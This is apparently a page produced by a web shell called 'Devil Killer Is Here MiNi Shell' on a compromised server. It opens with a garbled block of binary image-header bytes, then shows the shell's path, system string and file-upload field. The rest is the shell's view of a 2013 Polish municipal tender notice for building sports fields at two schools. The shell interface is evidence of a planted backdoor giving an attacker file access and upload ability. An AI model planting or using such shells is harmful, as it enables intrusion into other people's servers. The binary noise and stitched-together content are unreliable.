JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130708/264722-N-2013.html

<p class="kh_header"><b>Łapy: Budowa boiska sportowego przy Zespole Szkół w Łapach ul. Letnia oraz przy Zespole Szkół w Płonce Kościelnej</b><br>
<b>Numer ogłoszenia: 264722 - 2013; data zamieszczenia: 08.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łapach , ul. gen. Wł. Sikorskiego 24, 18-100 Łapy, woj. podlaskie, tel. 085 7152251, faks 085 7152256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lapy.podlasie.pl; www.bip.lapy.podlasie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boiska sportowego przy Zespole Szkół w Łapach ul. Letnia oraz przy Zespole Szkół w Płonce Kościelnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest budowa boiska wielofunkcyjnego przy Zespole Szkół w Łapach ul. Letnia oraz przy Zespole Szkół w Płonce Kościelnej. 
CZĘŚĆ I Zespól Szkół w Łapach ul. Letnia

BOISKO  DO  KOSZYKÓWKI
        wymiary :                                     13,00m x 22,00m
        powierzchnia :                            286,00 m2
BOISKO  DO  PIŁKI  RĘCZNEJ (PIŁKI  MINI  NOŻNEJ)
        wymiary :                                     20,00m x 40,00m
        powierzchnia :                            800,00 m2
BOISKO  DO  SIATKÓWKI
        wymiary :                                     18,00m x 9,00m
        powierzchnia :                            162,00 m2
BOISKO DO TENISA ZIEMNEGO
        wymiary :                                     23,78m x 10,97m
        powierzchnia :                            260,87 m2
OGÓŁEM BOISKO  WIELOFUNKCYJNE
        wymiary :                                     44,00m x 22,00m
        powierzchnia :                            968,00 m2
 
Budowa boiska wielofunkcyjnego z nawierzchni poliuretanowej o wymiarach pola gry 22,00m x 44,00m. Boisko otoczone będzie opaską betonową szerokości 74 cm z kostki betonowej żółtej o wymiarach 10cmx10cmx6cm, ograniczonej z obu stron obrzeżem trawnikowym o wymiarach 8x30x100cm.

KONSTRUKCJA NAWIERZCHNI POLIURETANOWEJ:
- granulat gumowy z lepiszczem poliuretanowym wraz ze strukturalnym powleczeniem  
  natryskowym w kolorze czerwonym o grubości 13mm,
- przepuszczalny podkład elastyczny ; granulat i ścier gumowy ze żwirem kwarcowym i   lepiszczem poliuretanowym o grubości 35mm,
- górna warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie frakcja 0,00 - 31,5mm o grubości 8,0cm,
- dolna warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie frakcja 31,5 - 63,0mm o grubości 15cm,
- podbudowa pomocnicza (warstwa mrozoodporna) z pospółki - jako istniejąca na obiekcie
- grunt rodzimy zagęszczony do Is min = 0,97

WYPOSAŻENIE BOISKA:
-cztery stojaki do koszykówki typu - Gęsia szyja
-jeden komplet do siatkówki z siatką. 
-jeden komplet do tenisa - siatka wraz ze słupkami. 
-dwie bramki do piłki ręcznej. 
-piłkochwyty - wysokość 6 m 

Ogrodzenie boiska zaprojektowano jako panelowe 
Chodniki, dojścia, teren miejsc siedzących z kostki brukowej betonowej.
Miejsca siedzące - typowe przenośne zestawy segmentowe. 
Odprowadzenie wód opadowych

CZĘŚĆ II  Zespól Szkół w Płonce Kościelnej

BOISKO  DO  KOSZYKÓWKI
        wymiary :                                     13,00m x 22,00m
        powierzchnia :                            286,00 m2
BOISKO  DO  PIŁKI  RĘCZNEJ  (PIŁKI  MINI  NOŻNEJ)
        wymiary :                                     20,00m x 40,00m
        powierzchnia :                            800,00 m2
BOISKO  DO  SIATKÓWKI
        wymiary :                                     18,00m x 9,00m
        powierzchnia :                            162,00 m2
BOISKO DO TENISA ZIEMNEGO
        wymiary :                                     23,78m x 10,97m
        powierzchnia :                            260,87 m2
OGÓŁEM BOISKO  WIELOFUNKCYJNE
        wymiary :                                     44,00m x 22,00m
        powierzchnia :                            968,00 m2
 
Przedmiotem inwestycji jest budowa boiska wielofunkcyjnego z nawierzchnią poliuretanową o wymiarach pola gry 22,00m x 44,00m. Boisko otoczone będzie opaską betonową szerokości 74 cm z kostki betonowej żółtej o wymiarach 10cmx10cmx6cm, ograniczonej z obu stron obrzeżem trawnikowym o wymiarach 8x30x100cm.

KONSTRUKCJA NAWIERZCHNI POLIURETANOWEJ:
- granulat gumowy z lepiszczem poliuretanowym wraz ze strukturalnym powleczeniem   
  natryskowym w kolorze czerwonym o grubości 13mm,
- przepuszczalny podkład elastyczny ; granulat i ścier gumowy ze żwirem kwarcowym i 
  lepiszczem poliuretanowym o grubości 35mm,
- górna warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie                      
  frakcja 0,00 - 31,5mm o grubości 8,0cm,
- dolna warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie                       
  frakcja 31,5 - 63,0mm o grubości 15cm,
- podbudowa pomocnicza (warstwa mrozoodporna) z pospółki - jako istniejąca na obiekcie
- grunt rodzimy zagęszczony do Is min = 0,97

WYPOSAŻENIE BOISKA:
- cztery stojaki do koszykówki typu - Gęsia szyja 
- jeden komplet do siatkówki z siatką
- jeden komplet do tenisa - siatka wraz ze słupkami
- dwie bramki do piłki ręcznej
- piłkochwyty - wysokość 6 m 

Ogrodzenie boiska  jako panelowe 
Chodniki, dojścia, teren miejsc siedzących z kostki brukowej betonowej.
Miejsca siedzące - typowe przenośne zestawy segmentowe.
Odprowadzenie wód opadowych

Szczegółowo przedmiot zamówienia został opisany w:
Rozdziale III Przedmiar robót, Dokumentacja projektowa,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.11.12.00-0, 45.21.22.21-1, 45.22.38.00-4, 45.23.24.52-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy o spełnieniu warunków o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>doświadczenie w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót odpowiadających swoim rodzajem i wartością przedmiotowi niniejszego przetargu tzn. 
część I budową boiska sportowego wielofunkcyjnego o nawierzchni poliuretanowej wraz z wyposażeniem o wartości nie mniejszej niż 250 000,00 zł brutto każda.
część II  budową boiska sportowego wielofunkcyjnego o nawierzchni poliuretanowej wraz z wyposażeniem o wartości nie mniejszej niż 250 000,00 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy o spełnieniu warunków o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się doświadczeniem zawodowym odpowiednim do funkcji, jakie zostaną im powierzone.
Wykonawca przedstawi w ofercie osoby na następujące stanowisko:
- kierownik budowy - posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej posiadający uprawnienia budowlane (bez ograniczeń) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie obowiązujących przepisów, przynależność do Okręgowej Izby Inżynierów Budownictwa. który pełnił funkcję kierownika budowy lub robót przy min. 2 robotach polegających na budowie boisk wielofunkcyjnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy o spełnieniu warunków o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość istotnych zmiany umowy w przypadku okoliczności, których nie można było przewidzieć w chwili zawarcia umowy dotyczące przedmiotu zamówienia lub umówionego terminu wykonania robót dotyczące:
1)	w zakresie wynagrodzenia - gdy nastąpi zmiana stawki podatku od towarów i usług (VAT) w związku ze zmianą przepisów o podatku od towarów i usług - o kwotę będącą różnicą pomiędzy kwotą VAT po zmianie stawki tego podatku;
2)	w zakresie terminu wykonania zamówienia, w przypadku:
a.	z powodu wystąpienia nadzwyczajnych warunków pogodowych uniemożliwiających wykonanie zamówienia zgodnie z warunkami wykonania określonymi w Szczegółowej Specyfikacji Technicznej (tj. ulewy, wichury, itp.) -przesunięcie terminu może nastąpić wyłącznie o uzasadniony okres czasu,
b.	z powodu okoliczności siły wyższej (zdarzenia, którego Strony nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub w całości jego zobowiązań umownych.)  np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, na czas jej działania uniemożliwiającego wykonywanie zamówienia,
c.	z uwagi na niezależne od Stron umowy okoliczności (w szczególności choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne) dotyczące osób kluczowych dla realizacji umowy np. kierownika robót, inspektora nadzoru, osób reprezentujących Strony,
d.	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które te działania nie są konsekwencją winy którejkolwiek ze stron - wyłącznie na okres uniemożliwienia Wykonawcy wykonywania zamówienia. Nie stanowi zmiany umowy zmiana adresów Wykonawcy i Zamawiającego. Zmiany takie dokonywane są w drodze jednostronnego pisemnego oświadczenia danej Strony i wywołują skutek od dnia doręczenia go drugiej Stronie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lapy.podlasie.pl; www.bip.lapy.podlasie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łapach ul. Gen. Wł. Sikorskiego 24 , 18-100 Łapy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2013 godzina 09:30, miejsce: Urząd Miejski w Łapach ul. Gen. Wł. Sikorskiego 24 18-100 Łapy pok. 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa boiska sportowego przy Zespole Szkół w Łapach ul. Letnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zespól Szkół w Łapach ul. Letnia

BOISKO  DO  KOSZYKÓWKI
        wymiary :                                     13,00m x 22,00m
        powierzchnia :                            286,00 m2
BOISKO  DO  PIŁKI  RĘCZNEJ (PIŁKI  MINI  NOŻNEJ)
        wymiary :                                     20,00m x 40,00m
        powierzchnia :                            800,00 m2
BOISKO  DO  SIATKÓWKI
        wymiary :                                     18,00m x 9,00m
        powierzchnia :                            162,00 m2
BOISKO DO TENISA ZIEMNEGO
        wymiary :                                     23,78m x 10,97m
        powierzchnia :                            260,87 m2
OGÓŁEM BOISKO  WIELOFUNKCYJNE
        wymiary :                                     44,00m x 22,00m
        powierzchnia :                            968,00 m2
 
Budowa boiska wielofunkcyjnego z nawierzchni poliuretanowej o wymiarach pola gry 22,00m x 44,00m. Boisko otoczone będzie opaską betonową szerokości 74 cm z kostki betonowej żółtej o wymiarach 10cmx10cmx6cm, ograniczonej z obu stron obrzeżem trawnikowym o wymiarach 8x30x100cm.

KONSTRUKCJA NAWIERZCHNI POLIURETANOWEJ:
- granulat gumowy z lepiszczem poliuretanowym wraz ze strukturalnym powleczeniem  
  natryskowym w kolorze czerwonym o grubości 13mm,
- przepuszczalny podkład elastyczny ; granulat i ścier gumowy ze żwirem kwarcowym i 
  lepiszczem poliuretanowym o grubości 35mm,
- górna warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie                      
  frakcja 0,00 - 31,5mm o grubości 8,0cm,
- dolna warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie                       
  frakcja 31,5 - 63,0mm o grubości 15cm,
- podbudowa pomocnicza (warstwa mrozoodporna) z pospółki - jako istniejąca na obiekcie
- grunt rodzimy zagęszczony do Is min = 0,97

WYPOSAŻENIE BOISKA:
-cztery stojaki do koszykówki typu  Gęsia szyja
-jeden komplet do siatkówki z siatką. 
-jeden komplet do tenisa - siatka wraz ze słupkami. 
-dwie bramki do piłki ręcznej. 
-piłkochwyty - wysokość 6 m 

Ogrodzenie boiska zaprojektowano jako panelowe 
Chodniki, dojścia, teren miejsc siedzących z kostki brukowej betonowej.
Miejsca siedzące - typowe przenośne zestawy segmentowe. 
Odprowadzenie wód opadowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.11.12.00-0, 45.21.22.21-1, 45.22.38.00-4, 45.23.24.52-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa boiska sportowego przy Zespole Szkół w Płonce Kościelnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zespól Szkół w Płonce Kościelnej

BOISKO  DO  KOSZYKÓWKI
        wymiary :                                     13,00m x 22,00m
        powierzchnia :                            286,00 m2
BOISKO  DO  PIŁKI  RĘCZNEJ  (PIŁKI  MINI  NOŻNEJ)
        wymiary :                                     20,00m x 40,00m
        powierzchnia :                            800,00 m2
BOISKO  DO  SIATKÓWKI
        wymiary :                                     18,00m x 9,00m
        powierzchnia :                            162,00 m2
BOISKO DO TENISA ZIEMNEGO
        wymiary :                                     23,78m x 10,97m
        powierzchnia :                            260,87 m2
OGÓŁEM BOISKO  WIELOFUNKCYJNE
        wymiary :                                     44,00m x 22,00m
        powierzchnia :                            968,00 m2
 
Przedmiotem inwestycji jest budowa boiska wielofunkcyjnego z nawierzchnią poliuretanową o wymiarach pola gry 22,00m x 44,00m. Boisko otoczone będzie opaską betonową szerokości 74 cm z kostki betonowej żółtej o wymiarach 10cmx10cmx6cm, ograniczonej z obu stron obrzeżem trawnikowym o wymiarach 8x30x100cm.

KONSTRUKCJA NAWIERZCHNI POLIURETANOWEJ:
- granulat gumowy z lepiszczem poliuretanowym wraz ze strukturalnym powleczeniem   
  natryskowym w kolorze czerwonym o grubości 13mm,
- przepuszczalny podkład elastyczny ; granulat i ścier gumowy ze żwirem kwarcowym i 
  lepiszczem poliuretanowym o grubości 35mm,
- górna warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie                      
  frakcja 0,00 - 31,5mm o grubości 8,0cm,
- dolna warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie                       
  frakcja 31,5 - 63,0mm o grubości 15cm,
- podbudowa pomocnicza (warstwa mrozoodporna) z pospółki - jako istniejąca na obiekcie
- grunt rodzimy zagęszczony do Is min = 0,97

WYPOSAŻENIE BOISKA:
- cztery stojaki do koszykówki typu  Gęsia szyja 
- jeden komplet do siatkówki z siatką
- jeden komplet do tenisa - siatka wraz ze słupkami
- dwie bramki do piłki ręcznej
- piłkochwyty - wysokość 6 m 

Ogrodzenie boiska  jako panelowe 
Chodniki, dojścia, teren miejsc siedzących z kostki brukowej betonowej.
